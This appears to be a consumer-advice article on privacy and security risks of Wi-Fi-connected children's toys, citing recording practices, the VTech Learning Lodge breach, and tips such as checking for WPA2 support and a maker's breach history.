The doll has a microphone and accesses the internet to answer your child's questions. Moreover, criminals could have the ability to collect your personal information. Tip: If the toy does require Wi-Fi, make sure it supports modern, more secure Wi-Fi capabilities like WPA2. Their speech-recognition software maker, Nuance Communications, violated federal rules by listening to children and saving the recordings. It's valuable to know how they are using your data. Don't provide personal information that seems extra or unnecessary. VTech had its app store database, Learning Lodge, hacked. As a result of the breach, over 11.6 million accounts were compromised in a cyberattack, exposing photos of children and parents as well as chat logs. The leaked profile data included names, genders and birth dates. Tip: Check to see if the manufacturer has had any cybersecurity issues in the past and, if so, how they responded. Likewise, if the company is relatively new, your device is definitely at greater risk. The interactive toy has the ability to communicate and record conversations. Those conversations are sent to the company's servers, analyzed and then stored in the cloud. The toy was criticized for spying on kids by recording their conversations. Over Wi-Fi, attackers can hijack the connection to spy on your children, steal personal information, and turn the doll's microphone into a surveillance device. Tip: Since the device is Wi-Fi enabled, confirm whether it supports modern security protocols. If the device only uses the WEP or WPA (but not WPA2) security standards, it may be too risky to use. Those standards are older and have, over time, become almost entirely insecure.